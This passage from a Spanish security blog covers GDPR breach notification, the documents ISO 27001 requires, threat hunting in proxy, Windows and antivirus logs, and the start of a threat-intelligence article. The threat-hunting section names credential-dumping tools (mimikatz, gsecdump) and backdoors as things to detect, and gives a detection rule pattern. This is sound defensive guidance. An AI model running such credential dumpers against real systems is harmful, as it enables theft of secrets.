de datos, que comenzará a aplicarse el día 25 de mayo de 2018, y que afectará directamente a todas las agencias de marketing online: la obligación de notificar a la Agencia Española de Protección de Datos y a los usuarios sobre las posibles violaciones de seguridad que sufran sus datos personales. ## El reglamento general de protección de datos Antes de nada conviene explicar que un reglamento europeo es una norma jurídica de alcance general que resulta aplicable a todos los países de la Unión Europea, entre los que se encuentra, obviamente, España. Esto quiere decir que, sin necesidad de que exista una ley nacional que lo trasponga, debe ser cumplido y los derechos y obligaciones que otorga pueden ser invocados ante los tribunales nacionales y comunitarios por los particulares. El Reglamento General de Protección de Datos de la Unión Europea (RGPD), entró en vigor el pasado 25 de mayo de 2016, si bien no comenzará a aplicarse hasta el 25 de mayo de 2018.Hasta ese momento, seguiremos sujetos a la Ley Orgánica de Protección de Datos (LOPD), la cual será sustituida por una nueva ley que viene de camino. Pues bien, una de las grandes novedades que trae este reglamento es la obligación de notificar por parte del encargado de custodiar los datos personales de cualquier posible violación de seguridad que pueda afectarles. ## ¿Qué son las violaciones de seguridad? El RGPD establece que las violaciones de seguridad de los datos abarcan todos los incidentes que puedan originar la destrucción, pérdida, modificación accidental o ilícita de aquellos datos personales que han sido cedidos para ser tratados y conservados, así como el acceso no autorizado a los mismos. Es decir, según esta ley, el borrado accidental o no de los registros, el acceso no autorizado a las bases de datos que contengan la información personal o el extravío de un teléfono móvil, ordenador o cualquier otro soporte físico dentro de la compañía serían consideradas violaciones de seguridad y serán tratadas conforme al Reglamento. ### El responsable de la protección de datos (DPO) El encargado de velar por la seguridad de los registros será el responsable de la protección de datos o Data Protection Officer (DPO). En principio, esta posición solo sería obligatoria para los organismos públicos y para las empresas que gestionen gran volumen de datos personales. No se especifica que magnitud deberán de tener las bases de datos de las empresas para que haya necesidad de nombrar un DPO, pero se sobreentiende que un gran número de agencias de marketing digital tendrán que nombrar a un responsable para la protección de datos, ya que este tipo de compañías utiliza el almacenaje de datos para segmentar y realizar campañas personalizadas que mejoren la experiencia del usuario, así como para facilitar la resolución de sus problemas mediante técnicas como el Inbound Marketing. ## Obligación de notificar Dice el RGPD en su artículo 33 que el responsable del tratamiento de los datos deberá notificar a la autoridad competente, en el caso de España a la Agencia Española de Protección de Datos (AEPD), de la violación de la seguridad de los datos personales. Esto resulta ser un cambio sustancial porque hasta ahora la LOPD solo obligaba a la notificación a las empresas de telecomunicaciones y proveedores de acceso a internet (ISP). - ¿Cuál es el plazo de la notificación?: *El plazo máximo es de 72 horas después de que haya tenido constancia de ella. En el caso de que dicha notificación no fuera posible en el plazo de 72 horas se deberá justificar los motivos de la dilación en el momento de realizar la notificación. - ¿A quién notificar?: El responsable del tratamiento de datos deberá notificar siempre a la AEPD. En el caso de que pueda existir algún riesgo para sus derechos y libertades deberá notificar además al interesado para que así pueda tomar las medidas necesarias. De este modo, por ejemplo, si la violación de seguridad resulta ser un movimiento inusual de usuario y contraseña, esta persona podrá cambiar su password en todas las plataformas en las que la utilice. - Contenido de la notificación: Descripción de la violación de la seguridad de los datos personales, así como, siempre que sea posible, las categorías y el número aproximado de interesados afectados. Comunicar el nombre y los datos de contacto del responsable de la protección de datos u cualquier otra persona que pueda arrojar luz de lo sucedido. Informar de los posibles riesgos de la violación de seguridad. Descripción de las medidas que el responsable del tratamiento haya adoptado o propuesto para resolver el problema. ## Valoración de los riesgos la seguridad Si el responsable del tratamiento de datos no realiza un idóneo análisis de los riesgos podría ser sancionado. A la hora de valorarlos se deberá intentar determinar los datos que pudieran ser afectados, de esta manera será más fácil establecer las posibles consecuencias de los daños. La simple sospecha de que haya podido producirse una violación de seguridad, sin que aún se conozcan sus circunstancias, no obligará todavía a la notificación, ya que la falta de información impedirá, normalmente, la evaluación del riesgo que pudieran sufrir los derechos y libertades de los interesados. No obstante, entendemos que, para garantizar la seguridad de los datos de nuestros clientes y usuarios, resultaría aconsejable pecar por exceso y comunicarse con la autoridad competente tan pronto se crea que ha podido producirse alguna situación de peligro para los datos personales. Más adelante podrá completarse la notificación formal. De esta manera, actuando con rapidez, podremos minimizar los efectos negativos de cualquier violación de seguridad. ## Excepciones a la obligación de notificar las violaciones de seguridad. El RGPD exime de la obligación de notificar las violaciones de seguridad cuando el riesgo para los derechos y libertades fundamentales de los interesados sea improbable. Un riesgo será improbable cuando el responsable de custodiar los datos hubiera adoptado medidas técnicas u organizativas apropiadas antes de que se produzca la violación de seguridad, convirtiendo los datos en ininteligibles para terceros. Esto sería por ejemplo un cifrado. A posteriori, se entenderá que el riesgo es improbable cuando el responsable de los datos, tras la quiebra de seguridad, implante las medidas técnicas necesarias para asegurar que el riesgo no llegue a materializarse. Por último, tampoco existirá obligación de notificar cuando la propia notificación implique un esfuerzo desproporcionado, en tal caso se podrá sustituir por alguna medida alternativa como una comunicación pública. ## Conclusiones Las agencias de marketing digital somos garantes de una gran cantidad de datos que nuestros clientes nos confían para que custodiemos y utilicemos con los fines estipulados en condiciones de seguridad. El conocimiento de la ley y su cumplimiento, así como la implantación de todos los medios técnicos y personales destinados para la prevención de cualquier violación de seguridad, son una parte muy importante de nuestro trabajo. Por ello, para nosotros resulta primordial mantener la confianza de nuestros usuarios y clientes proporcionándoles todas las herramientas necesarias para asegurar la protección de sus preciados datos. Este es el motivo por el que aplaudimos cualquier reforma legislativa que tenga como fin la protección de los derechos de los usuarios y la consecución de un Internet más seguro. Gracias a la obligación de notificar por parte del responsable, los usuarios podrán conocer el estado de sus datos y junto a la AEPD, y también la propia empresa receptora, trabajar para evitar cualquier posible perjuicio --- # Documentos y registros requeridos en la ISO 27001:2013 URL: https://ciberseguridad.blog/documentos-y-registros-iso-27001-2013/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-02-17 Actualizado: 2026-10-08 Tema: Compliance > La normativa ISO 27001 así como la ISO 27002 , requieren de una serie de documentos y registro obligatorios a disposición del auditor. ¡ CONOCELOS ! A menudo y si estas inmerso en el mundo de la ciberseguridad, es normal que conozcas , y si no lo conoces, tarde o temprano deberias conocer qué documentación (o "información documentada" en el lenguaje simplificado de las normas ISO) es formal y estrictamente necesaria para que el Sistema de Gestión de Seguridad de la Información (SGSI) de una organización cumpla con la ISO 27001:2013 y por ello, os traigo de una forma más sencilla esta lista de verificación para tratar de resolver este problema. La lista de verificación identifica en la documentación y los registros que se requieren explícitamente en el cuerpo principal de la ISO / IEC 27001 como obligatorios (Válidos tambien para la ISO 27002:2013, más documentación adicional, así como registros u otras formas de evidencia que están implícitas o insinuadas a lo largo de la ISO 27001:2013. Es posible identificar varias formas posibles de documentación, ya que hay varias formas de cumplir con los requisitos formales. Pero, no los necesitas a todos. Os dejo una lista detallada, de lo que necesitais y lo que os pedira el auditor para verificar que cumplimos la 27001 de una forma correcta: DOCUMENTOS CAPITULO ISO 27001:2013 Alcance del SGSI 4.3 Políticas y objetivos de seguridad de la información 5.2 - 6.2 Metodología de evaluación y tratamiento de riesgos 6.1.2 Declaración de aplicabilidad 6.1.3.d Plan de tratamiento del riesgo 6.1.3.e - 6.2 Informe sobre evaluación y tratamiento de riesgos 8.2 - 8.3 Definición de funciones y responsabilidades de seguridad a.7.1.2 - a.13.2.4 Inventario de activos a.8.1.1 Uso aceptable de los activos a.8.1.3 Política de control de acceso a.9.1.1 Procedimientos operativos para gestión de TI a.12.1.1 Principios de ingeniería para sistema seguro a.14.2.5 Política de seguridad para proveedores a.15.1.1 Procedimiento para gestión de incidentes a.16.1.5 Procedimientos de la continuidad del negocio a.17.1.2 Requisitos legales, normativos y contractuales a.18.1.1 Listado extendo y necesidad: Alcance del SGSI Este documento es, habitualmente, bastante corto y se redacta al inicio de la implementación de ISO 27 001. En general,se trata de un documento independiente, aunque puede ser unificado con una política de seguridad de la información. Políticas y objetivos de seguridad de la información La política de seguridad de la información generalmente es un documento breve y de alto nivel que detalla el principal objetivo del SGSI. Los objetivos para el SGSI, en general, se presentan como un documento independiente, pero también pueden ser unificados en la política de seguridad de la información. Metodología e informes de evaluación y tratamiento de riesgos La metodología de evaluación y tratamiento del riesgo es, habitualmente, un documento de 4 a 5 páginas y debe ser redactado antes que se realice la evaluación y el tratamiento de riesgos. El informe de evaluación y tratamiento de riesgos debe ser redactado una vez que se realizó la evaluación y el tratamiento de riesgos, y allí se resumen todos los resultados. Declaración de aplicabilidad La Declaración de aplicabilidad (o DdA) se redacta en base a los resultados del tratamiento del riesgo; es un documento clave dentro del SGSI porque describe no sólo qué controles del Anexo A son aplicables, sino también cómo se implementarán y su estado actual.También deberiamos considerar a la Declaración de aplicabilidad como un documento que describe el perfil de seguridad de su empresa. Plan de tratamiento del riesgo Este es básicamente, un plan de acción sobre cómo implementar los diversos controles definidos por la DdA. Este documento se desarrolla en función de la Declaración de aplicabilidad y se utiliza y actualiza activamente a lo largo de toda la implementación del SGSI. A veces se puede fusionarcon el Plan del proyecto. Funciones y responsabilidades de seguridad El mejor método es describir estas funciones y responsabilidades en todas las políticas y procedimientos de la forma más precisa posible. Algunas empresas prefieren detallar las funciones y responsabilidades de seguridad en sus descripciones del trabajo. Las funciones y responsabilidades de seguridad para terceros se definen a través de contratos. Inventario de activos Si no se cuenta con un inventario de este tipo antes del proyecto ISO27001,la mejor forma de hacerlo es directamente a partir del resultado de la evaluación de riesgos ya que allí, de todos modos, se tienen que identificar todos los activos y sus propietarios. Uso aceptable de los activos Habitualmente, este documento se confecciona bajo la forma de una política y puede cubrir un amplio rango de temas porque la norma no define muy bien este control. Política de control de acceso En este documento se puede cubrir sólo la parte comercial de la aprobación de acceso a determinada información y sistemas, también se puede incluir el aspecto técnico del control de acceso. Además,podemos optar por definir reglas para acceso lógico únicamente o también para acceso físico. Este documento se debería redactar después de finalizado el proceso de evaluación y tratamiento de riesgos. Procedimientos operativos para gestión de TI Se puede crear este procedimiento como un único documento o como una serie de políticas y procedimientos.Normalmente, aquí podemos abarcar todas las áreas de las secciones A.12 y A.13 : gestión de cambios , servicios de terceros ,copias de seguridad, seguridad de red, códigos maliciosos, eliminación y destrucción, transferencia de información, supervisión del sistema ,etc. Principios de ingeniería para sistemas seguros Este es un nuevo control en ISO 27001:2013 y requiere que se documenten los principios de ingeniería de seguridad bajo la forma de un procedimiento o norma y que se defina cómo incorporar técnicas de seguridad en todas las capas de arquitectura: negocio, datos, aplicaciones y tecnología. Estos principios pueden incluir validación de datos de entrada, depuración, técnicas para autenticación, controles de sesión segura, etc. Política de seguridad para proveedores Este también es un control nuevo en ISO 27001:2013, y una política de este tipo puede abarcar un amplio rango de controles: cómo se realiza la selección de potenciales contratistas, cómo se ejecuta la evaluación de riesgos de un proveedor, qué cláusulas incluir en el contrato, cómo supervisar el cumplimiento de cláusulas contractuales de seguridad, cómo modificar el contrato, cómo cerrar el acceso una vez cancelado el contrato, etc. Procedimiento para gestión de incidentes Este es un procedimiento importante que define cómo se informan, clasifican y manejan las debilidades, eventos e incidentes de seguridad. Este procedimiento también define cómo aprender de los incidentes de seguridad de la información para que se puedan evitar en el futuro. Un procedimiento de esta clase también puede invocar al plan de continuidad del negocio si un incidente ha ocasionado una interrupción prolongada. Procedimientos de la continuidad del negocio Generalmente se trata de planes de continuidad del negocio, planes de respuesta ante incidentes, planes de recuperación para el sector comercial de la organización y planes de recuperación ante desastres (planes de recuperación para infraestructura de TI). Estos procedimientos se describen con mayor detalle en la norma ISO 22301, la principal norma internacional para continuidad del negocio. Requisitos legales, normativos y contractuales Este listado debe confeccionarse en la etapa más temprana posible del proyecto porque muchos documentos tendrán que ser desarrollados de acuerdo a estos datos. Este listado debe incluir no sólo las responsabilidades para el cumplimiento de determinados requerimientos, sino también los plazos. Registros de capacitación, habilidades, experiencia y calificaciones Es el departamento de recursos humanos el que generalmente se encarga de llevar estos registros. Si no, cualquier persona que habitualmente se encargue de los registros de los empleados debería ser quien realice este trabajo. Básicamente, sería suficiente con una carpeta en la que se encuentren todos los documentos. Resultados de supervisión y medición La forma más sencilla de describir cómo se miden los controles es a través de políticas y procedimientos que definan a cada control. En general, esta descripción puede ser realizada al final de cada documento, y cada descripción tiene que definir los tipos de ICD (indicadores clave de desempeño) que es necesario medir para cada control o grupo de controles. Una vez que se establece este método de control, se debe realizar la medición en función de dicho método. Es importante reportar los resultados de esta medición de forma regular a las personas que están a cargo de la evaluación. Programa de auditoría interna El programa de auditoría interna no es más que un plan anual para realizar las auditorías, para las empresas más pequeñas, puede tratarse solamente de una auditoría, mientras que para las organizaciones más grandes puede ser una serie de, por ejemplo, 20 auditorías internas. Este programa debe definir quién realizará las auditorías, los métodos que se utilizarán, los criterios que se aplicarán, etc. Resultados de las auditorías internas Un auditor interno debe generar un informe de auditoría, que incluye los resultados de la auditoría (observaciones y medidas correctivas). Este informe debe ser confeccionado dentro de un par de días tras realizar la auditoría interna. En algunos casos, el auditor interno tendrá que verificar que todas las medidas correctivas se aplicaron según lo esperado. Resultados de la revisión por parte de la dirección. Estos registros se presentan, normalmente, bajo la forma de actas de reunión y deben incluir todo el material tratado durante la reunión de la dirección, como también todas las decisiones que se tomaron. Estas actas pueden ser en papel o en formato digital. Resultados de acciones correctivas Generalmente, estos son incluidos en los formularios para medidas correctivas (FMC). Sin embargo,es mucho mejor agregar estos registros en alguna aplicación que ya esté en uso en la organización, las medidas correctivas no son más que listas de actividades a realizar con responsabilidades, tareas y plazos bien definidos. Registros sobre actividades de los usuarios, excepciones y eventos de seguridad Habitualmente se llevan de dos formas: Primero en formato digital, generados en forma automática o semiautomática como registros de diversas TI y de otros sistemas, y segundo en papel, donde cada registro se hace manualmente. Procedimiento para control de documentos. En general, este es un procedimiento independiente, de dos o tres páginas de extensión. Si ya implementamos alguna otra norma como ISO9001, ISO14001, ISO22301 o similar, podemos utilizar el mismo procedimiento para todos estos sistemas de gestión. A veces es mejor redactar este procedimiento como el primer documento de un proyecto. Controles para gestión de registros La forma más sencilla es redactar el control de registros en cada política o procedimiento (u otro documento) que requiera la generación de un registro. Estos controles, normalmente son incluidos hacia el final de cada documento y se confeccionan bajo el formato de una tabla que detalla dónde se archiva el registro, quién tiene acceso, cómo se protege, por cuánto tiempo se archiva, etc. Procedimiento para auditoría interna Habitualmente este es un procedimiento independiente que puede tener entre dos y tres páginas y que tiene que ser redactado antes de que comience la auditoría interna. En cuanto al procedimiento para control de documentos, un procedimiento para auditoría interna puede ser utilizado para cualquier sistema de gestión. Procedimiento para medidas correctivas Este procedimiento no debería exceder las dos o tres páginas y puede ser confeccionado al final del proyecto de implementación, aunque es mejor hacerlo antes para que los empleados puedan familiarizarse con él. DOCUMENTOS CAPITULO ISO 27001:2013 Registros de capacitación, habilidades, experiencia y calificaciones 7.2 Resultados de supervisión y medición 9.1 Programa de auditoría interna 9.2 Resultados de las auditorías internas 9.2 Resultados de la revisión porpartede la dirección 9.3 Resultados de acciones correctivas 8.2 - 8.3 Definición de funciones y responsabilidades de seguridad 10.1 Registros sobre actividades de los usuarios, excepciones y eventos de seguridad a.12.4.1 - a.12.4.3 Tras los registros y documentos indicados, no se marca una lista fija de documentos y registros que se puedan utilizar durante la implementación de ISO 27001:2013 , sino que estos son los documentos minimos ya que la norma permite que se agregue cualquier otro documento que pueda mejorar el nivel de seguridad de la información. ## Documentos no obligatorios de uso frecuente ISO 270001:2013 DOCUMENTOS CAPITULO ISO 27001:2013 Procedimiento para control de documentos 7.5 Controles para gestión de registros 7.5 Procedimiento para auditoría interna 9.2 Procedimiento para medidas correctivas 10.1 Política Trae tu propio dispositivo (BY OD) a.6.2.1 Política sobre dispositivos móviles y teletrabajo a.6.2.1 Política de clasificación de la información a.8.2.1 / 2 / 3 Política de claves a.9.2.1 / 2 / 4, a.9.3.1, a.9.4.3 Política de eliminación y destrucción a.8.3.2, a.11.2.7 Procedimiento para trabajo en áreas seguras a.11.1.5 Política de pantalla y escritorio limpio a.11.2.9 Política de gestión de cambio a.12.1.2, a.14.2.4 Política de creación de copias de seguridad a.12.3.1 Política de transferencia de la información a.13.2.1 / 2 / 3 Análisis del impacto en el negocio a.17.1.1 Plan de prueba y verificación a.17.1.3 Plan de mantenimiento y revisión a.17.1.3 Con este listado de documentos / registros tanto obligatorios como complementarios, tendrimos recogidas las necesidades documentales referentes a la ISO 27001. Sé lo que estais pensado, esta parte "compliance" no es tan bonita (Al menos para mí) como el resto de las partes de la seguridad, pero es igual o mas importante que estas otras. Mantener un gobierno de nuestra seguridad mediante un SGSI perfectamente adaptado a nuestros procesos de negocio es algo imprescindible, para que el resto de partes, engranen correctamente. > El "Cumplimiento" es solo un subconjunto del "gobierno" y no al revés ". --- # Cazando amenazas de ciberseguridad URL: https://ciberseguridad.blog/cazando-amenazas-de-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-02-12 Actualizado: 2026-09-29 Tema: Vulnerabilidades y Ataques Informaticos > Cazar amenzas e incidentes de ciberseguridad, requiere de habilidades especiales de profesionales de la seguridad muy cualificados. ¡APRENDE A DESCUBRIRLAS! La caza de ciberamenzas se puede comparar con la caza en la naturaleza. Requiere paciencia y un buen ojo. Requiere tener el arsenal apropiado a disposición para ser efectivo para poder derribar a la presa. La caza también puede ser un medio para el control de plagas, al igual que la erradicación de un entorno infestado de malware que requiere una buena limpieza. El seguimiento hábil y la adquisición de un objetivo difícil de alcanzar puede ser muy estimulante y gratificante, pero para poder hacerlo, uno debe estar bien equipado con las habilidades y herramientas adecuadas. El primer elemento que necesitarás, por supuesto, son los datos. Tener un SIEM centralizado (información de seguridad y gestión de eventos) con todos nuestros dispositivos alimentando al monstruo sería maravilloso, pero incluso el simple acceso a los registros de proxy, registros de antivirus o incluso los registros del controlador de dominio de Windows nos beneficiaría en nuestra caza. No importa si tenemos cientos o incluso miles de millones de eventos, el proceso de caza reduce el ruido como un tallador de madera digital que se deshace para revelar su obra maestra. Nuestra obra maestra será la identificación de una amenaza desconocida para la empresa. El segundo elemento que necesitamos es una lista de actividades sospechosas que se generarían a partir de los registros que estamos recopilando. Es imprescindible tener un enfoque basado en la inteligencia para este proceso, de lo contrario, nos sentiriamos como si estubiesemos enjaulados en una bola esférica de plástico rebotando en las paredes de un callejón sin salida. Veremos a continuación algunos ejemplos de lo que debemos buscar al buscar amenazas en nuestros registros de proxy, registros de antivirus, registros de Windows y registros varios logs. ## Buscando incidentes de ciberseguridad en el Proxy - ¿Hay tráfico enviado desde el puerto 22 a través de servidores proxy o incluso firewalls? Por supuesto, es una buena práctica restringir el origen de este protocolo de texto claro, pero si no está bloqueado, podemos buscar cualquier patrón de exfiltración en los datos o incluso conexiones bajas y lentas. - ¿Hay alguna conexión de red que muestre el mismo patrón de bytes y bytes cada día? Esto fue más prevaleciente hace cinco años atrás, pero el malware de hoy todavía aprovecha esta técnica de señalización a su "master" para hacerles saber que se han implantado con éxito. Por lo tanto, buscar la misma cantidad de bytes y bytes de manera frecuente podría ser un signo de que algo malo esta pasando en nuestra red. - Identifica una lista de todos los sitios DNS dinámicos que visitan los puntos finales y observa específicamente los valores atípicos en toda nuestra organización. Si solo 3 máquinas de cada 20,000 visitan turtle.dyndns.com una vez al día, o tienen afinidad por mirar "criatura con caparazón cartilaginoso", o "Mr. Robot" de forma continuada tenemos una infraestructura de comand and control. Por supuesto, podría haber otras explicaciones, la gente se puede volver muy obsesiba o yo que se ... Tambien podemos buscar: - Cadenas únicas de agente de usuario - Cadenas codificadas en Base64 dentro de la URL - Descarga de ejecutables (Intercepción SSL) ## Buscando incidentes de ciberseguridad en Windows - Establece un perfil de los registros de eventos, por ejemplo "Se intentó iniciar sesión con credenciales explícitas" e incluye en la lista blanca la actividad normal. Esto sería para el Evento ID 4648 y/o 552. Este registro se inicia cuando un usuario se conecta a un sistema o ejecuta un programa localmente usando credenciales alternativas. ¿Alguien dijo 'Movimiento lateral'? A los ciberatacantes les encanta moverse lateralmente como una serpiente deslizándose buscando masticar cualquier dato que encuentre atractivo. Propiedad intelectual, secretos comerciales, políticas de seguridad interna, etc. - "Usuario añadidos al grupo de usuarios privilegios", Identificadores dee eventos 4728, 4732, 4756. La escalada de privilegios a menudo se producirá una vez que se haya alcanzado un punto de de entrada dentro de un entorno. Estos registros pueden ayudar en la identificación de la actividad de escalado de privilegios. También es bueno hacer un perfil de las actividades legítimas de su administrador de TI, ya que con frecuencia generarán un poco de ruido en dicha búsqueda. - Sé que esto es obvio, pero intentos fallidos de inicio de sesión. Esto puede ser difícil de filtrar, dependiendo del tamaño de nuestra organización, pero buscar sucesivos intentos fallidos de acceso usando múltiples cuentas podría indicar intentos de fuerza bruta. Centrarse en un intento fallido por cuenta puede significar que un actor intente iniciar sesión con las contraseñas que anteriormente abandonó del entorno con la esperanza de que todavía funcione. Podemos buscar información en los evento de Windows 4625, 529-539. Tambien podemos buscar: - Limpieza de registros - Eventos de Windows 104 y 1102 - Registros de bloqueo de EMET: 1 y 2 - La aplicación se cuelga y cuelga - Windows Events 1000 & 1002 - Errores de Windows Defender - Eventos de Windows 1005, 1006, 1008, 1010, 2001, 2003, 2004, 3002, 5008 ## Buscando incidentes de ciberseguridad en el antivirus ¿Por qué no cazar incidentes a través del registros de antivirus? ¿No demostrarán que estoy cubierto y el antivirus hizo su trabajo para remediar la infección? Bueno, uno esperaría que el antivirus pudiera ser súper efectivo para identificar malware todo el tiempo, pero la verdad es que no lo es. Los escáners antivirus y el software están basados principalmente en firmas, lo que significa que detectan malware identificando un segmento de código dentro de un archivo que coincide con su base de datos interna de código malicioso. En realidad, es bastante elemental identificar este segmento de código en el que se activará el antivirus, realizará cambios, volverá a compilarse y ¡pluf! ¡Tu código ya no se detectará como malicioso! Sin embargo, los actores de amenazas cometen errores cuando han logrado una intrusión exitosa. Estos son algunos de los elementos que debemos buscar y las razones para buscarlos: - Señales de cualquier programa de descarga de contraseñas que se ejecute dentro del entorno. Esto incluiría pwdump, gsecdump, mimikatz, etc. Investiga qué marca tu proveedor de antivirus como un programa de descarga de contraseñas y ¡ve a buscarlo! Por ejemplo, una de las herramientas de detección de volcado de contraseña de McAfee se llama HTool-GSECDump. He visto como un actor ejecutó un descargador de contraseñas, el antivirus lo detectó y lo eliminó, y el atacante ejecutó con éxito otro volcador que no se detectó. Entonces, aunque han logrado su objetivo inicial, han dejado una pista de valor probatorio. - Esto viene con el tiempo, pero conocer a tus adversarios es en última instancia el objetivo de todo esto. Despues podemos comenzar a perfilar las tácticas, técnicas y procedimientos. Conocer las herramientas que utilizan con mayor frecuencia y los tipos de puertas traseras que pueden aprovechar. Algunas puertas traseras de amenazas avanzadas comunes incluyen PlugX, 9002 RAT, Nettraveler, Derusbi, Winnti, Pirpi, etc. ¡Si te encuentras con nombres como estos dentro de tus registros de antivirus, sé 'fino'! Entonces, una vez más, investigaría lo que el proveedor de antivirus llama detecciones y buscalas. Las probabilidades pueden ser escasas si se trata de una pieza específica de malware cuyo principal objetivo no es solo establecer una conexión de comand and control, sino NO ser detectada al hacerlo. - Identifica cualquier detección con el nombre 'dropper' en ella. Un programa cuentagotas está destinado a descargar e instalar una puerta trasera o virus. Es como enviar a tu hermano menor al pasillo de la planta alta a altas horas de la noche para ver si los padres todavía están despiertos para que puedas encender tu Playstation para jugar. El gotero es el tipo "la costa está clara", que luego inicia la segunda etapa de la acción. Si se ha detectado un cuentagotas, es posible que todavía haya algo al acecho en las profundidades del sistema operativo en el que se detectó. Algunas soluciones antivirus también tienen la capacidad de crear detecciones personalizadas. El antivirus McAfee tiene una sección dentro de su ePolicy Orchestrator para configurar 'Políticas de protección de acceso'. Por ejemplo, si deseamos registrar ejecuciones de archivos binarios desde el directorio APPDATA de un usuario, podmeos crear una alerta con la siguiente sintaxis "C: \ Users \ * \ AppData \ Local \ Temp \ *. Exe". Ahora, cada vez que un programa se inicia desde ese directorio, se generará un registro y se enviará a la consola. ## Feliz caza de incidentes de ciberseguridad Ahora sé lo que estás pensando. Todo se ve genial, pero tal vez al empresa no puede o no quiere pagar una solución empresarial y el volumen de reporte de incidentes es reducido. Bueno, no debemos tener miedo. Existen algunas herramientas de código abierto bastante buenas con la capacidad de cubrir algunos de los ejemplos anteriores. Si cogemos Sysmon del sitio de Window, nos encontramos con una solución de software gratuito con la capacidad de registrar todas las creaciones de proceso con línea de comando completa, hash, etc., junto con la capacidad de recopilar actividad basada en red muy buena, que almacena información en en C: \ Windows \ System32 \ winevt \ Logs \ Microsoft-Windows-Sysmon % 4Operational.evtx. El proceso de instalación es ridículamente simple, sin embargo, deberemos configurar el WEF (Reenvío de eventos de Windows) para enviar estos registros a una solución de administración de registros centralizada como el SIEM. Sin embargo, configurar WEF con Sysmon os puede llevar a pegaros un tiro. Se deben realizar cambios manuales en el registro y posteriormente, viene la muerte IT. Si estamos abierto a tener un agente adicional intalado, NxLog es una herramienta de código abierto que puede reenviar esos registros con facilidad. Finalmente, necesitará una solución que injiera estos datos y proporcione una interfaz intuitiva para cazar estas ciberamenazas. Si no ha oído hablar de la pila ELK (Elasticsearch, Logstash y Kibana), es la solución gratuita perfecta para satisfacer estas necesidades (Una pena que el módulo de machine learning no lo sea). Para probarlo rápidamente, existen imagenes VirtualBox para máquina virtual disponibles en la red que se pueden poner en funcionamiento en menos de 10 minutos. Teneis un buenisimos tutorial de instalación aquí Probablemente podríamos seguir aquí por siempre con terminos que podriamos buscar específicamente durante una cacería de ciberdelincuentes, pero esos son los tipos de eventos que debemos cribar día tras día refinando nuestro instinto. Los actores de amenazas hacen todo lo que está en su poder para integrarse e intentar convertirse en un fantasma dentro de nuestra red. ¿Mi recomendación? Conviértete en un Cazafantasmas. Cargz la pistola ectoplásmica de conocimientos sobre ciberamenazas, centraliza todos tus datos de registro críticos y pivotea, pivotea y pivotea hasta que encuentrea tu Slimer. Luego, baja una caja de Ecto Cooler Hi-C y vuelve a empezar. Puede sonar a ciencia ficción, pero es una reaidad, los atacantes, van un paso por delante tuya, vuelvete tanto o más sigiloso que ellos y aprende a sorprenderlos. > Conviertete en un autentico cazador de amenazas de ciberseguridad. Conviertete en el eslavón que tu empresa necesita --- # Las mejores prácticas para aplicar ciberinteligencia de amenazas URL: https://ciberseguridad.blog/las-mejores-practicas-para-aplicar-la-inteligencia-de-amenazas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-01-30 Actualizado: 2026-10-08 Tema: Operaciones de Seguridad > La inteligencia de amenazas es una de las áreas de seguridad de la información más comentadas y clave para la estrategia de seguridad en 2018. ¡CONOCELA! La ciberinteligencia de amenazas es una de las áreas de seguridad de la información más comentadas en la actualidad. Investigaciones recientes revelaron que el 46 por ciento de los profesionales de seguridad esperan que la inteligencia contra amenazas sea una parte muy importante de su estrategia en 2018. Al mismo tiempo, proveedores, proveedores de servicios, consultores e integradores están buscando desesperadamente formas de utilizar "Threat Intelligence", ofreciendo a las empresas ayuda en la aplicación de inteligencia sobre amenazas actuales y emergentes de ciberseguridad para proteger datos y sistemas valiosos. Pero cuando llega el momento de elegir entre estos servicios y productos, es difícil saber por dónde empezar. Establecer la estrategia de inteligencia en ciberseguridad y como esta nos resultará beneficiosa para nuestra organización será fundamental para obtener el mayor retorno de la inversión (ROI) en este campo emergente. A lo largo de este post, veremos conceptos como: - Comprender la importante distinción entre datos de amenaza e ciberinteligencia de amenzas - Obtener información sobre el valor de diferentes fuentes de ciberinteligencia y cómo trabajar con las mismas - Aprenderemos sobre la importancia del contexto para la ciberinteligencia de amenazas - Obtenner mejores prácticas y casos para implementar la ciberinteligencia de amenazas como parte de la estrategia de seguridad de la información en nuestra empresa En las etapas iniciales de creación de una capacidad de ciberinteligencia de amenazas, es vital desarrollar una comprensión de los servicios, proveedores, herramientas y plataformas que están disponibles actualmente o que usamos o usan nuestros clientes en el día a día. Desafortunadamente, como el interés en esta área de seguridad ha aumentado, el término "ciberinteligencia de amenaza" ha sido adoptado y aplicado en muchos lugares donde quizás no se aplique de una forma correcta. En particular, los términos "datos", "información" e "inteligencia" a menudo se usan indistintamente, lo que puede hacer que las distinciones entre los distintos productos competidores sean caoticas para productos totalmente distintos, pero que se llaman de igual forma o predican que hacen lo mimo. Muchos servicios brindan datos de amenazas en bruto, pero lo etiquetan como ciberinteligencia de amenazas, y esto, de ciberinteligencia tiene poco. Entonces, ¿cuál es exactamente la diferencia? ¿Y cómo pueden procesarse los datos de amenazas en información y (en última instancia) inteligencia? Simplemente, los factores clave a considerar son el volumen y la usabilidad de los datos. Normalmente, los datos están disponibles en grandes volúmenes, y si bien tiene el potencial de convertirse en información, primero requiere una extracción selectiva, organización, y algunas veces análisis y formateo para su presentación. Por ejemplo, un terminal de punto de venta (TPV) en una tienda minorista con un amplio transito de clientes, recopila grandes cantidades de datos sin formato cada día, pero esos datos no se convierten en información hasta que no se procesa. Los detalles de las solicitudes de conexión individuales son un excelente ejemplo de datos porque son simples declaraciones de hecho que no están abiertas a discusión y que las máquinas pueden procesar fácilmente. La información se produce cuando se combinan una serie de puntos de datos para responder una pregunta simple. En nuestro ejemplo de compras, los datos recopilados por nuestra terminal TPV pueden indicar qué artículos compra cada cliente, cuándo los compra y a qué precio. Si estos puntos de datos se trazan en un gráfico para determinar los hábitos de compra y el gasto regional, la información resultante es mucho más valiosa que la suma de sus partes. Tenga en cuenta que, aunque este es un resultado mucho más útil que los datos sin procesar, aún no informa directamente una acción específica. La inteligencia lleva este proceso un paso más allá al machear datos e información para contar una historia (un pronóstico, por ejemplo) que puede usarse para informar la toma de decisiones. Fundamentalmente, la inteligencia nunca responde una pregunta simple, sino que pinta una imagen que puede usarse para ayudar a las personas a responder preguntas mucho más complicadas. Para revisar nuestra analogía de la venta minorista, la información sobre tendencias de compra podría usarse en combinación con la investigación de psicología conductual para ayudar a que los compradores encuentren los artículos que desean. Esta inteligencia no responde directamente a la pregunta de cómo hacer que la gente compre más, pero ayuda en un proceso de toma de decisiones empresariales. Como era de esperar, a medida que avanzamos en el camino de los datos a la información y a la 